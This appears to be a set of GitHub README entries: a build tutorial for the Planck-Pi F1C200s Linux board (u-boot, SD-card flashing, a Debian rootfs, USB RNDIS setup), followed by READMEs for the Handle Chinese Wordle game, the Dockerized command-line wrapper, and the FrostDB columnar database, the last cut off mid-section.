peng-zhihui/Planck-Pi;0. Overview Chip introduction Basics 1. Power-on boot order of the F1Cxxxs chips 2. Toolchain download 1. Hardware design 2. Environment setup 2.1 Preparing the Docker development environment 2.1.1 Installing dependencies 2.2.2 Installing the cross-compilation toolchain 2.4 Standard build procedure 2.5 Flashing 3. u-boot development 4. Linux kernel development 5. root-fs development 5.1 Preparing the environment 5.2 Building the Debian filesystem 5.3 Configuring the filesystem 5.3.1 Minimal configuration 5.3.2 Adding a boot-time startup script 5.3.3 Fixing the root-fs partition being mounted read-only after boot 5.3.4 Adding USB-OTG & Gadget-RNDIS support 5.3.5 Enabling swap 5.4 Packaging & deploying the filesystem 6. Application development 6.1 System application integration 6.2 Driver development 6.3 Linux app development 7. Troubleshooting 0. Overview This project is an ultra-mini, low-cost Linux development board based on the Allwinner F1C200s chip. It was originally built for debugging one of my small personal projects; all of the hardware and software (u-boot, kernel, root-fs) is now open-sourced. On-board resources: a 128x80 OLED; a microphone & power amplifier that can drive an external speaker; a double-sided Type-C connector providing USB-to-serial on one side and USB-OTG on the other; a USB-A port for connecting external devices; an SD-card slot; most IO pins broken out. The board costs under 50 RMB to build, and with the material provided it is well suited as an entry-level board for learning Linux. Chip introduction The Allwinner F1C200s is a highly integrated, low-power mobile application processor suitable for a variety of multimedia audio/video devices. The F1C200s is based on the ARM9 architecture and integrates SiP DDR, so the surrounding circuitry can be extremely simple; it supports HD video decoding (H.264, H.263, MPEG 1/2/4), integrates an audio codec and I2S/PCM interfaces, and is an easy-to-develop, cost-effective part — also a good fit for an entry-level Linux board. | Feature | Description | | ------------ | ------------------------------------------------------------ | | CPU | ARM9 CPU architecture, 16KByte D-Cache, 2KByte I-Cache | | Memory | SIP 64MB DDR1, SD2.0, eMMC 4.41 | | Video | H.264 1920x1080@30fps decoding MPEG1/2/4 1920x1080@30fps decoding MJPEG 1280x720@30fps encoding JPEG encode size up to 8192x8192 | | Camera | 8-bit CMOS-sensor interface CCIR656 protocol for NTSC and PAL | | Audio | Integrated analog audio codec with two DAC channels and one ADC channel, maximum 192kHz DAC sample rate and 48kHz ADC sample rate One I2S/PCM interface | | Display | LCD RGB interface up to 1280x720@60fps TV CVBS output, support NTSC/PAL, with auto plug detecting | | Connectivity | USB OTG, SDIO, IR, 3 x TWI, 2 x SPI, 3 x UART | | OS | Melis, Linux OS | | Package | QFN88, 10mm x 10mm | | Process | 40nm | | Highlights | Supports H.264 1920x1080@30fps decoding Supports MJPEG 1280x720@30fps encoding Integrated 64MB DDR1 and audio CODEC Low cost, low power, easy development | Comparison with other chips in the family: Basics 1. Power-on boot order of the F1Cxxxs chips The chip can boot from SPI flash or from an SD card; since the flash capacity is small and offers less room to play with, the rest of this document assumes SD-card boot. Reference: In what order does the F1C100s search SPI flash at boot? After power-on, the BROM built into the f1c100s (in-chip mask ROM, cannot be erased) starts: it first checks whether a card is present in SD0; if so, it reads the data at the 8K offset of the card and checks whether it is valid boot data — if it is, the BROM hand-off is complete, otherwise it moves to the next step; it checks whether an SPI0 NOR flash (W25QXXX, MX25LXXX) is present with valid boot data — if so, the BROM hand-off is complete, otherwise it moves on; it checks whether an SPI0 NAND flash is present with valid boot data — if so, the BROM hand-off is complete, otherwise it moves on; having found no bootable medium at all, the system enters USB FEL mode and can then be flashed over USB. 
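If the chip does fall through to FEL mode, the USB link can be sanity-checked from the host with sunxi-tools (the same package mentioned in the flashing section below); this is a hedged example that assumes sunxi-tools is installed:

```bash
# Board connected over USB in FEL mode; assumes sunxi-tools is installed on the host
sunxi-fel version   # prints SoC/BROM information if the FEL link is working
```

2. 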
Toolchain download Toolchain official site: https://www.linaro.org/ or Arm GNU Toolchain. Taking linaro as the example: go to support->downloads to reach the download page, click GNU cross-toolchain binary archives to get to the download list with every toolchain version. I used latest-7/arm-linux-gnueabi/, i.e. gcc-linaro-7.5.0-2019.12-x86_64_arm-linux-gnueabi. 1. Hardware design The schematics are in this repository as source files and PDF. Points worth noting: the board's Type-C connector provides different functions depending on orientation — one side is a USB-to-TTL serial adapter for kernel debugging, the other side is the chip's native USB port. In the kernel I enabled the USB RNDIS gadget, so this USB port can emulate a network adapter and share the PC's network connection; no external WiFi or Ethernet module is needed, which is very convenient. Since the chip has only one USB interface, I added an OTG jumper on the board so it can also act as a Host for external devices: with the jumper off, the OTG port works in Device mode, i.e. the Type-C port can emulate a NIC or other gadgets such as MTP; with the jumper cap fitted, the board acts as a Host, and USB devices such as flash drives, keyboards and mice can be plugged into the USB-A port on the right. Note that the Type-C USB function is then disabled, so you need to log in to the board over the serial port. 2. Environment setup I recommend simply using my pre-configured complete image: flash it to an SD card with a tool such as Etcher and it is ready to use — convenient and reliable. Image credentials: user pi, password planck; root password planck. The tutorial below is for those who want to configure uboot, the kernel and the filesystem themselves. 2.1 Preparing the Docker development environment To keep the build environment minimal, the environment is built as an ubuntu 20.04 Docker image. 2.1.1 Installing dependencies First install Docker yourself (plenty of tutorials online), then pull the official Ubuntu Docker image, choosing version ubuntu:20.04: sudo docker pull ubuntu:20.04 In practice I used my own pre-configured local image (with nano, ssh and so on installed, and domestic apt mirrors configured). Then start the container (adjust the paths to your own): sudo docker run -it --name planck-pi-env --network host \ -p 8022:22 \ -v /home/pengzhihui/WorkSpace:/workspace \ --privileged \ planck-pi-env.image:latest Inside the container, run apt update and apt upgrade to refresh the packages, then install the required dependencies: sudo apt-get install xz-utils nano wget unzip build-essential git bc swig libncurses5-dev libpython3-dev libssl-dev pkg-config zlib1g-dev libusb-dev libusb-1.0-0-dev python3-pip gawk bison flex 2.2.2 Installing the cross-compilation toolchain Download the toolchain from the address introduced earlier (you can do this from the shared folder on the VMware host): wget http://releases.linaro.org/components/toolchain/binaries/7.2-2017.11/arm-linux-gnueabi/gcc-linaro-7.2.1-2017.11-x86_64_arm-linux-gnueabi.tar.xz Note: the GCC version must be newer than 6; here the 7.2.1 cross toolchain is fetched, but you can download other versions as well. Unpack the toolchain archive: mkdir /usr/local/arm tar -vxf gcc-linaro-7.2.1-2017.11-x86_64_arm-linux-gnueabi.tar.xz -C /usr/local/arm Configure the environment variable: nano ~/.bashrc and add the following line: export PATH=$PATH:/usr/local/arm/gcc-linaro-7.2.1-2017.11-x86_64_arm-linux-gnueabi/bin Make it take effect immediately: source ~/.bashrc Query the version to confirm the installation succeeded: arm-linux-gnueabi-gcc -v Once configured, you can commit the container to an image for easy future deployment: sudo docker commit planck-pi-env planck-pi-env.image sudo docker save -o planck-pi-env.image.tar planck-pi-env.image 2.4 Standard build procedure Enter the source directory and build with: make ARCH=arm CROSS_COMPILE=arm-linux-gnueabi- -j4 Around line 250 of the top-level u-boot Makefile you can add a default compiler, so a plain make works without the extra arguments: ``` ifeq ($(HOSTARCH),$(ARCH)) CROSS_COMPILE ?= endif ARCH ?= arm CROSS_COMPILE ?= arm-linux-gnueabi- ``` 2.5 Flashing FEL flashing is not used here; if you are interested, see these tutorials: "Installing and using the Allwinner sunxi-tools flashing utility" and "Notes on building and running xboot on the Allwinner V3S". Below is the TF-card flashing procedure. Before building the system on the TF card, the card must be partitioned and formatted; you can also do this graphically with tools such as GParted. On the command line: first find the device node of the TF card plugged into the PC (usually /dev/sdb; /dev/sdb1 etc. is used as the example below): sudo fdisk -l If the TF device was auto-mounted, unmount it first (all partitions, if there are several): sudo umount /dev/sdb1... Partition the card: sudo fdisk /dev/sdb The steps are: if partitions already exist, delete each of them with d; create new partitions with n — the first partition gets 1M for u-boot-with-spl, the second 128M for the Linux kernel, and the remaining space all goes to the root-fs. First partition (primary, default number 1, default start 2048, size +1M): n p [Enter] [Enter] [Enter] +1M Second partition (primary, number 2, default start, size +128M): n p [Enter] [Enter] [Enter] +128M Third partition (primary, number 3, default start, allocate all remaining space): n p [Enter] [Enter] [Enter] [Enter] Then w to write the changes and exit. Format the partitions: sudo mkfs.vfat /dev/sdb1 # format partition 1 as FAT sudo mkfs.ext4 /dev/sdb2 # format partition 2 as EXT4 sudo mkfs.ext4 /dev/sdb3 # format partition 3 as EXT4 About the formats: EXT4 — disks used only by Linux systems; NTFS — disks shared with Windows; FAT — disks shared by all systems and devices. Use dd to write u-boot-sunxi-with-spl.bin into the first partition's region: sudo dd if=path/to/u-boot-sunxi-with-spl.bin of=/dev/sdb bs=1024 seek=8 sync Note: bs=1024 seek=8 applies an 8192-byte offset. The 8K offset is needed because the FSBL — the bootROM — is hard-wired to load the SPL from the 8K address of the device and then enter uboot. So when flashing, the offset you give must be relative to the raw storage device, not relative to a partition! 
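To double-check that the SPL actually landed at the 8 KiB device offset, you can read it back and look for the boot header magic. This is a hedged check, assuming the standard Allwinner eGON.BT0 header at the start of the SPL:

```bash
# Read back 1 KiB from the 8 KiB offset of the card (adjust /dev/sdb to your device)
sudo dd if=/dev/sdb bs=1024 skip=8 count=1 2>/dev/null | xxd | head -n 2
# The ASCII column of the first line should contain the magic string "eGON.BT0"
```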
The 8K figure comes from the description offset = 0x2000 in the file buildroot-mangopi-r/board/allwinner/generic/genimage-sdcard.cfg. Whether you actually dedicate a separate partition to uboot does not really matter, since the dd write simply overwrites that region anyway; deliberately reserving a 1M region just keeps it cleanly separated from the kernel partition that follows. For how to use genimage, see the official Buildroot documentation: The Buildroot user manual. ``` image bootfs.vfat { vfat { files = { "zImage", "devicetree.dtb" } } size = 8M } image sysimage-sdcard.img { hdimage { } partition u-boot { image = "u-boot-sunxi-with-spl.bin" offset = 0x2000 size = 1016K # 1MB - 8192 } partition boot { partition-type = 0xC bootable = "true" image = "bootfs.vfat" } partition rootfs { partition-type = 0x83 image = "rootfs.ext4" } } ``` * For the meaning of partition-type above, see: [Listing of MBR/EBR Partition Types](https://thestarman.pcministry.com/asm/mbr/PartTypes.htm). * For the kernel's FAT partition, simply mount it after partitioning and copy zImage and the dtb file into it. How the partitions holding the kernel image and device tree are specified can be seen in the configuration in configs/uboot.env — that is where the relevant parameters are passed to the kernel at boot. 3. u-boot development [to be completed] * u-boot file structure . ├── api // platform-independent wrappers: string printing, display, network, memory ├── arch // organized by architecture │ ├── arm │ │ └── cpu │ │ │ └── arm926ejs │ │ │ │ └── sunxi // cpu-level operations, e.g. timer reads │ │ │ │ │ └── u-boot-spl.lds // SPL placement (linker script) │ │ └── dts │ │ │ └── suniv-f1c100s-licheepi-nano.dts // configuration for the f1c100s chip │ │ │ └── suniv-f1c100s-licheepi-nano.dtb │ │ │ └── suniv-f1c100s.dtsi │ │ │ └── suniv.dtsi │ │ └── lib // library files │ │ └── mach-sunxi │ │ │ └── board.c // board_init_f │ │ │ └── dram_sun4i.c // DDR operations: reset, clocks, delays, ODT, etc. │ │ │ └── dram_helpers.c // DDR setup and read/write tests ├── board │ ├── sunxi │ │ └── board.c // sunxi_board_init entry point │ │ └── dram_suniv.c // default DRAM parameters ├── cmd // u-boot command-line commands ├── common // includes the SPL ├── configs // default menuconfig configurations, e.g. driver support │ ├── licheepi_nano_defconfig │ ├── licheepi_nano_spiflash_defconfig ├── disk // disk partition drivers ├── doc ├── drivers // peripheral drivers ├── dts ├── examples ├── fs // assorted filesystems ├── include │ ├── configs │ │ └── sunxi_common.h // pre-configured parameters, e.g. serial port number │ │ └── suniv.h ├── lib // algorithms such as crypto and compression ├── net // network protocols: nfs, tftp, etc. ├── post ├── scripts 4. Linux kernel development 5. root-fs development Since the F1C200s has only 64M of RAM, it cannot run filesystems like Ubuntu Core (minimum RAM requirement 512M), so usually you either generate a simple filesystem with buildroot or develop bare-metal. To conveniently use the rich Debian software ecosystem, however, we can build a minimal Debian system ourselves — the minimal rootfs is around 180MB. 5.1 Preparing the environment Two main tools are needed to build the filesystem: qemu, which emulates the ARM9 architecture — with the qemu emulator you can chroot from an x86 host into an ARM environment and carry out all the root-fs configuration; and debootstrap, which builds the Debian filesystem. Note: both tools must be run inside the Docker container that has the cross-compilation environment installed, otherwise the resulting filesystem will throw format errors when run on the board. Install the software inside Docker: apt install qemu-user-static apt install debootstrap mkdir path/to/rootfs-debian 5.2 Building the Debian filesystem Before building the filesystem, decide which release to build. Pick a mirror with fast access from the Debian worldwide mirror list; here the Huawei mirror is used: mirrors.huaweicloud.com. Note: the chosen mirror must support the armel hardware architecture, because the F1Cxxxs chips are armel. On the differences between the architectures: armel — short for "arm eabi little endian", targets older 32-bit ARM processors without a hardware floating-point unit (FPU); armhf — short for "arm hard float", only for newer 32-bit ARM processors implementing at least ARMv7 and version 3 of the ARM vector floating-point spec (VFPv3); arm64 — for 64-bit ARM processors implementing at least ARMv8; 64-bit ARM is hard-float by default. Then pick the Debian release — here the latest, buster: debootstrap --foreign --verbose --arch=armel buster rootfs-debian http://mirrors.huaweicloud.com/debian/ cd rootfs-debian mount --bind /dev dev/ mount --bind /sys sys/ mount --bind /proc proc/ mount --bind /dev/pts dev/pts/ cd .. cp /usr/bin/qemu-arm-static rootfs-debian/usr/bin/ chmod +x rootfs-debian/usr/bin/qemu-arm-static LC_ALL=C LANGUAGE=C LANG=C chroot rootfs-debian /debootstrap/debootstrap --second-stage --verbose LC_ALL=C LANGUAGE=C LANG=C chroot rootfs-debian 
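At this point you are inside the emulated ARM environment; a quick hedged sanity check (assuming the second debootstrap stage completed successfully) is to ask dpkg which architecture it thinks it is running on:

```bash
# Inside the chroot: should print "armel" if the rootfs was built correctly
dpkg --print-architecture
```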
5.3 Configuring the filesystem 5.3.1 Minimal configuration After the build finishes, chroot into the filesystem from Docker to change the password and other settings; enter the chroot environment with: LC_ALL=C LANGUAGE=C LANG=C chroot rootfs-debian Note: when starting the Docker container earlier, the --privileged flag must be given, otherwise the mount commands above fail with permission errors. Once the final chroot command above has completed, you can use apt-get and friends to install the packages the filesystem needs, change the root login password, and so on: ``` apt install net-tools usbutils ssh passwd root # change the password nano /etc/ssh/sshd_config # enable SSH login by setting PermitRootLogin yes ``` If the arrow keys stop working, type the bash command to enter a bash shell. 5.3.2 Adding a boot-time startup script /etc/init.d in the filesystem is responsible for starting and stopping Linux services; to make the system run scripts and commands automatically at boot, here is how to add a new startup entry. First create a file /etc/init.d/runOnBoot with the following content: ``` #!/bin/sh # /etc/init.d/runOnBoot ### BEGIN INIT INFO # Provides: runOnBoot # Required-Start: $local_fs $syslog $network # Required-Stop: $local_fs $syslog $network # Default-Start: 2 3 4 5 # Default-Stop: 0 1 6 # Short-Description: runOnBoot startup # Description: runOnBoot auto startup 1.0 ### END INIT INFO # ------------------------------------------------------------------------------ swapon /opt/images/swap mkdir /sys/kernel/config/usb_gadget/gg cd /sys/kernel/config/usb_gadget/gg echo "0x0502" > idVendor echo "0x3235" > idProduct mkdir functions/rndis.rn0 mkdir configs/c1.1 ln -s functions/rndis.rn0 configs/c1.1/ echo "musb-hdrc.1.auto" > UDC ifconfig usb0 192.168.137.2 ifconfig usb0 up route add default gw 192.168.137.1 # Demo: run a script at boot script_path=/home/start.sh if [ ! -r ${script_path} ]; then echo "${script_path} not existing" else . ${script_path} fi # ------------------------------------------------------------------------------ ``` Make the file executable: chmod +x /etc/init.d/runOnBoot Finally add the symlink: ln -s /etc/init.d/runOnBoot /etc/rc2.d/S99runOnBoot The directories /etc/rc.d/rc0.d/ through /etc/rc.d/rc6.d/ correspond to different runlevels; scripts whose names start with S are run at startup, in the order of the number that follows, so S99 starts last. Reboot and you will see the commands and scripts run automatically. 5.3.3 Fixing the root-fs partition being mounted read-only after boot A freshly configured filesystem needs an fstab so the corresponding partitions are mounted automatically; edit the /etc/fstab file: ``` /dev/root / ext2 rw,noauto 0 1 proc /proc proc defaults 0 0 devpts /dev/pts devpts defaults,gid=5,mode=620,ptmxmode=0666 0 0 tmpfs /dev/shm tmpfs mode=0777 0 0 tmpfs /tmp tmpfs mode=1777 0 0 tmpfs /run tmpfs mode=0755,nosuid,nodev 0 0 sysfs /sys sysfs defaults 0 0 /opt/images/swap swap swap defaults 0 0 ``` 
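If a board is already up with a read-only root, a standard one-off remount gives you a writable filesystem for the current session (the fstab entry above is the permanent fix):

```bash
# Temporary workaround on a running board; only lasts until the next reboot
mount -o remount,rw /
```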
5.3.4 Adding USB-OTG & Gadget-RNDIS support References: "Configuring an RNDIS gadget (u_ether) via configfs (libcomposite) on Allwinner platforms, and the Windows driver"; USB Gadget/Ethernet - linux-sunxi.org; "LicheePi notes 2 — sharing the network and a virtual serial port with a Linux Gadget composite device – LotLab". A USB gadget is a device that connects to a host in USB-device mode — for example, when a phone is plugged into a PC over USB, the phone is the USB gadget. On this board, USB gadget support lets the USB port emulate a virtual NIC, a virtual serial port, an MTP device and more, which is very convenient; the concrete configuration follows. RNDIS setup: first enable the relevant options in the kernel: Device Drivers ---> [*] USB support ---> <M> Inventra Highspeed Dual Role Controller (TI, ADI, AW, ...) MUSB Mode Selection (Dual Role mode) ---> *** Platform Glue Layer *** <M> Allwinner (sunxi) *** MUSB DMA mode *** [*] Disable DMA (always use PIO) USB Physical Layer drivers ---> <M> NOP USB Transceiver Driver <M> USB Gadget Support ---> <M> USB Gadget functions configurable through configfs [*] RNDIS Then add some configuration in the filesystem: cd /sys/kernel/config/usb_gadget mkdir gg cd gg/ echo "0x0502" > idVendor echo "0x3235" > idProduct mkdir functions/rndis.rn0 mkdir configs/c1.1 ln -s functions/rndis.rn0 configs/c1.1/ echo "musb-hdrc.1.auto" > UDC Bring up the usb0 interface and assign it an IP address: ifconfig usb0 192.168.137.2 ifconfig usb0 up The 137 subnet is used because the plan is to give the board internet access later through Windows network sharing over USB, and Windows fixes the shared subnet to 192.168.137.1. On the Windows side, install the driver: manually select "network adapter" and add the driver shown below. A new adapter then appears under network adapters; configure a static IP for it as shown. At this point the two sides should be able to ping each other, but the board may still be unable to reach the internet; configure a default gateway and DNS server: ``` route add default gw 192.168.137.1 # this does not survive a reboot — add it to the startup script ``` DNS records live in the file /etc/resolv.conf and can be edited in the resolv.conf format: ``` nano /etc/resolv.conf # change it to: nameserver 8.8.8.8 ``` If you can ping www.baidu.com, the configuration is done. 5.3.5 Enabling swap The chip's SiP memory is only 64MB, which is not enough in most cases, so enable swap to use part of the SD card as swap memory. Check memory usage with free -m: ``` free -m total used free shared buff/cache available Mem: 54 15 6 0 31 34 Swap: 0 0 0 ``` Create a dedicated directory /opt/images/: mkdir /opt/images/ rm -rf /opt/images/swap Create a file of the required size, e.g. 512M: dd if=/dev/zero of=/opt/images/swap bs=1024 count=512000 Turn the file into a swap area and enable it: mkswap /opt/images/swap swapon /opt/images/swap Use free -m to check that the swap is active; if so, make it mount automatically at boot: ``` nano /etc/fstab # add the line: /opt/images/swap swap swap defaults 0 0 ``` 5.4 Packaging & deploying the filesystem After configuration, clean the caches and leave the chroot environment: apt clean exit In Docker, umount the bound directories: umount dev/ Enter the filesystem and pack everything into a tarball: cd rootfs-debian tar cvf ../rootfs-debian.tar . Extract the resulting rootfs-debian.tar anywhere into the filesystem partition of the SD card. Alternatively, plug in the SD card and copy all the files directly (open a terminal on the VMware host); from a terminal in the mounted SD-card root-fs partition, run: sudo cp -Rf path/to/rootfs-debian/* ./ Then plug the card into the board and boot. For the follow-up configuration, run the following commands with superuser privileges: ```bash chown root:root /usr/bin/sudo chmod 4755 /usr/bin/sudo nano /etc/hosts # append your own username, e.g. pi, after localhost ``` 6. Application development 6.1 System application integration 6.2 Driver development 6.3 Linux app development 7. Troubleshooting SSH refuses connections: Permissions xxx for '/etc/ssh/ssh_host_rsa_key' are too open. Other references: [Index] Allwinner F1C100S/F1C200S study notes; "Nanny-level tutorial": the full Allwinner F1C100S/F1C200S spi-flash boot bring-up, flashing, and pitfall guide; MangoPi 芒果派 | f1c200s; LicheePi Nano full-process guide;Super TINY & Low-cost Linux Develop-Kit Based On F1C200s.;[]
peng-zhihui/Planck-Pi
antfu/handle;汉兜 Handle A Chinese Hanzi variation of Wordle . 汉字 Wordle. handle.antfu.me PLEASE DO NOT SPOIL! Note The answer database will no longer be updated after February 28, 2023; from then on, puzzles are drawn at random from the past year's puzzles. The repository is open under the MIT license; forks and modifications are welcome, provided the original repository and author are credited. Thank you all for the support and love for Handle. Development Setup Install Node.js >=v16 and pnpm Run pnpm install Run pnpm dev and visit http://localhost:4444 Idiom corrections The idiom database is stored in ./src/data/idioms.txt - the list of known idioms ./src/data/polyphones.json - the list of idioms with special pronunciations The two do not overlap. If you come across a missing idiom or a wrong pronunciation, edit the file ./src/data/new.txt, one idiom per line, then run pnpm run update; the script automatically fetches data from 汉典 (a Chinese dictionary site) to update the idiom database. Idioms missing from 汉典 as well are left in new.txt and must be checked and added manually. Tech Stack Vue 3 Vite VueUse UnoCSS Vitesse Lite License MIT License © 2021-PRESENT Anthony Fu;A Chinese Hanzi variation of Wordle - 汉字 Wordle;wordle,game,wordle-chinese
antfu/handle
datastack-net/dockerized;Dockerized Run popular commandline tools without installing them. shell dockerized <command> Supported commands If your favorite command is not included, it can be added very easily. See Customization . Dockerized will also fall back to over 150 commands defined in jessfraz/dockerfiles . Cloud aws az (Azure CLI) doctl s3cmd Database dolt mssql mysql postgres psql pg_dump pg_dumpall Dev-Ops & Docker ansible ansible-playbook helm Git git gh (Github) Languages & SDKs dotnet go gofmt (haskell) ghci java perl php composer (prolog) swipl (SWI-Prolog) lua node npm npx vue yarn python pip python python2 ruby gem rake (rust) rustc typescript tsc Networking http telnet wget Unix tree zip Other jq mkdocs (latex) pdflatex protoc scrapy swagger-codegen youtube-dl (Youtube downloader) Installation Make sure Docker is installed on your machine. Download the latest zip from our Release Page . Extract it to a folder, for example your home directory. Add the dockerized/bin directory to your PATH Instructions **Linux / MacOS:** ```bash export PATH="$PATH:$HOME/dockerized/bin" ``` **Windows** > See: [How to add a folder to `PATH` environment variable in Windows 10](https://stackoverflow.com/questions/44272416) Running from source You can run dockerized directly from source-code. Installation from Source - Requirements: - [Git](https://git-scm.com/downloads) - [Docker](https://docs.docker.com/get-docker/) - Steps - Clone the repository ```shell git clone https://github.com/datastack-net/dockerized.git ``` - Run `dockerized`: ```shell bin/dockerized --help ``` - The first time you run dockerized, it will compile itself. - Compilation is done within docker, no dependencies needed. - To re-compile after changing the source code, run: - `dockerized --compile` (runs within docker) - `dockerized --compile=host` (runs on your machine, requires Go 1.17+) - You do not need to re-compile to add commands. See [Add a command](DEV.md). Usage Run any supported command, but within Docker. shell dockerized <command> Examples : bash dockerized node --version # v16.13.0 dockerized vue create new-project # create a project with vue cli dockerized tsc --init # initialize typescript for the current directory dockerized npm install # install packages.json See CLI Reference for all options. Use Cases Quickly try out command line tools without the effort of downloading and installing them. Installing multiple versions of node/python/typescript. You need unix commands on Windows. You don't want to pollute your system with a lot of tools you don't use. Easily update your tools. Ensure everyone on the team is using the same version of commandline tools. Design Goals All commands work out of the box. Dockerized commands behave the same as their native counterparts. Files in the current directory are accessible using relative paths. Cross-platform: Works on Linux, MacOS, and Windows (CMD, Powershell, Git Bash). Suitable for ad-hoc usage (i.e. you quickly need to run a command, that is not on your system). Configurability: for use within a project or CI/CD pipeline. Switching command versions Ad-hoc Add :<version> to the end of the command to override the version. shell dockerized node:15 Listing versions To see which versions are available, run: ```shell dockerized node:? or dockerized node: ``` Environment Variables Each command has a <COMMAND>_VERSION environment variable which you can override. 
python → PYTHON_VERSION node → NODE_VERSION tsc → TSC_VERSION npm → NODE_VERSION ⚠ npm's version is determined by node. See .env for a list of configurable versions. Global Create a dockerized.env file in your home directory for global configuration. ```shell dockerized.env (example) NODE_VERSION=16.13.0 PYTHON_VERSION=3.8.5 TYPESCRIPT_VERSION=4.6.2 ``` Per project (directory) You can also specify versions and other settings per directory and its subdirectories. This allows you to "lock" your tools to specific versions for your project. Create a dockerized.env file in the root of your project directory. All commands executed within this directory will use the settings specified in this file. Ad-hoc (Unix) Override the environment variable before the command, to specify the version for that command. shell NODE_VERSION=15.0.0 dockerized node Ad-hoc (Windows Command Prompt) Set the environment variable in the current session, before the command. cmd set NODE_VERSION=15.0.0 dockerized node Customization Dockerized uses Docker Compose to run commands, which are defined in a Compose File. The default commands are listed in docker-compose.yml . You can add your own commands or customize the defaults, by loading a custom Compose File. The COMPOSE_FILE environment variable defines which files to load. This variable is set by the included .env file, and your own dockerized.env files, as explained in Environment Variables . To load an additional Compose File, add the path to the file to the COMPOSE_FILE environment variable. Including an additional Compose File Globally To change global settings, create a file dockerized.env in your home directory, which loads an extra Compose File. In this example, the Compose File is also in the home directory, referenced relative to the ${HOME} directory. The original variable ${COMPOSE_FILE} is included to preserve the default commands. Omit it if you want to completely replace the default commands. ```bash ~/dockerized.env COMPOSE_FILE="${COMPOSE_FILE};${HOME}/docker-compose.yml" ``` ```yaml ~/docker-compose.yml ``` Per Project To change settings within a specific directory, create a file dockerized.env in the root of that directory, which loads the extra Compose File. ${DOCKERIZED_PROJECT_ROOT} refers to the absolute path to the root of the project. ```shell ./dockerized.env COMPOSE_FILE="${COMPOSE_FILE};${DOCKERIZED_PROJECT_ROOT}/docker-compose.yml" ``` ```yaml ./docker-compose.yml ``` Adding custom commands After adding your custom Compose File to COMPOSE_FILE , you can add your own commands. ```yaml docker-compose.yml version: "3" services: du: image: alpine entrypoint: ["du"] ``` Now you can run dockerized du to see the size of the current directory. To learn how to support versioning, see Development Guide: Configurable Version . You can also mount a directory to the container: ```yaml docker-compose.yml version: "3" services: du: image: alpine entrypoint: ["du"] volumes: - "${HOME}/.config:/root/.config" - "${DOCKERIZED_PROJECT_ROOT}/foobar:/foobar" ``` Make sure host volumes are absolute paths . For paths relative to home and the project root, you can use ${HOME} and ${DOCKERIZED_PROJECT_ROOT} . It is possible to use relative paths in the service definitions, but then your Compose File must be loaded before the default: COMPOSE_FILE=${DOCKERIZED_PROJECT_ROOT}/docker-compose.yml;${COMPOSE_FILE} . All paths are relative to the first Compose File. Compose Files are also merged in the order they are specified, with the last Compose File overriding earlier ones. 
Because of this, if you want to override the default Compose File, you must load it before your file, and you can't use relative paths. To keep compatibility with docker-compose, you can specify a default value for DOCKERIZED_PROJECT_ROOT , for example: ${DOCKERIZED_PROJECT_ROOT:-.} sets the default to . , allowing you to run like this as well: docker-compose run --rm du -sh /foobar . To customize existing commands, you can override or add properties to the services section of the Compose File, for the command you want to customize. For example, this is how to set an extra environment variable for dockerized aws : ```yaml docker-compose.yml version: "3" services: aws: environment: AWS_DEFAULT_REGION: "us-east-1" ``` If you'd like to pass environment variables directly from your dockerized.env file, you can expose the variable as follows: ```bash dockerized.env AWS_DEFAULT_REGION="us-east-1" ``` ```yaml docker-compose.yml version: "3" services: aws: environment: AWS_DEFAULT_REGION: "${AWS_DEFAULT_REGION}" ``` For more information on extending Compose Files, see the Docker Compose documentation: Multiple Compose Files . Note that the extends keyword is not supported in the Docker Compose version used by Dockerized. Localhost Dockerized applications run within an isolated network. To access services running on your machine, you need to use host.docker.internal instead of localhost . shell dockerized telnet host.docker.internal 8080 # instead of telnet localhost 8080 Limitations It's not currently possible to access parent directories. (i.e. dockerized tree ../dir will not work) Workaround: Execute the command from the parent directory. (i.e. cd .. && dockerized tree dir ) Commands will not persist changes outside the working directory, unless specifically supported by dockerized .;Run popular commandline tools within docker;[]
datastack-net/dockerized
polarsignals/frostdb;This project is still in its infancy; consider it not production-ready. It probably has various consistency and correctness problems, and all APIs will change! FrostDB is an embeddable wide-column columnar database written in Go. It features semi-structured schemas, uses Apache Parquet for storage, and Apache Arrow at query time. Building on top of Apache Arrow, FrostDB provides a query builder and various optimizers (using DataFrame-like APIs). FrostDB is optimized for use cases where the majority of interactions are writes, with occasional analytical queries over this data. FrostDB was built specifically for Parca for Observability use cases. Read the announcement blog post to learn about what made us create it: https://www.polarsignals.com/blog/posts/2022/05/04/introducing-arcticdb/ (FrostDB was originally called ArcticDB) Why you should use FrostDB Columnar data stores have become incredibly popular for analytics. Structuring data in columns instead of rows leverages the architecture of modern hardware, allowing for efficient processing of data. A columnar data store might be right for you if you have workloads where you write a lot of data and need to perform analytics on that data. FrostDB is similar to many other embeddable columnar databases such as DuckDB. FrostDB may be a better fit for you if you: - Are developing a Go program - Want to embed a columnar database in your program instead of running a separate database server - Have immutable datasets that don't require updating or deleting - Have data containing dynamic columns, where the number of columns in the schema may increase at runtime FrostDB is likely not suitable for your needs if: - You aren't developing in Go - You require a standalone database server - You need to modify or delete your data - You query by rows instead of columns Getting Started You can explore the examples directory for sample code using FrostDB. Below is a snippet from the simple database example. It creates a database with a dynamic column schema, inserts some data, and queries it back out. https://github.com/polarsignals/frostdb/blob/ee6970eff139c58a45998a87c02b661f32be5cbe/examples/simple/simple.go#L17-L69 Design choices FrostDB was specifically built for Observability workloads. This resulted in several characteristics that make it unique. Table Of Contents: Columnar Layout Dynamic Columns Immutable Snapshot isolation Columnar layout Observability data is most useful when it is highly dimensional and those dimensions can be searched and aggregated efficiently. Contrary to many relational databases (MySQL, PostgreSQL, CockroachDB, TiDB, etc.) that store all data belonging to a single row together, a columnar layout stores all data of the same column in one contiguous chunk of data, making it very efficient to scan and aggregate data for any column. FrostDB uses Apache Parquet for storage, and Apache Arrow at query time. Apache Parquet is used for storage to make use of its efficient encodings to save on memory and disk space. Apache Arrow is used at query time as a foundation to vectorize the query execution. 
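As a toy illustration of the difference (not FrostDB internals — just the two layouts side by side in plain Go): scanning a single column in the columnar form touches one contiguous slice instead of every row.

```go
package main

import "fmt"

func main() {
	// Row-oriented: all fields of one row are stored together.
	type row struct {
		ts  int64
		val float64
	}
	rows := []row{{1, 0.5}, {2, 0.7}}

	// Column-oriented: all values of one column are stored contiguously,
	// so aggregating "val" only has to read the vals slice.
	ts := []int64{1, 2}
	vals := []float64{0.5, 0.7}

	fmt.Println(rows, ts, vals)
}
```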
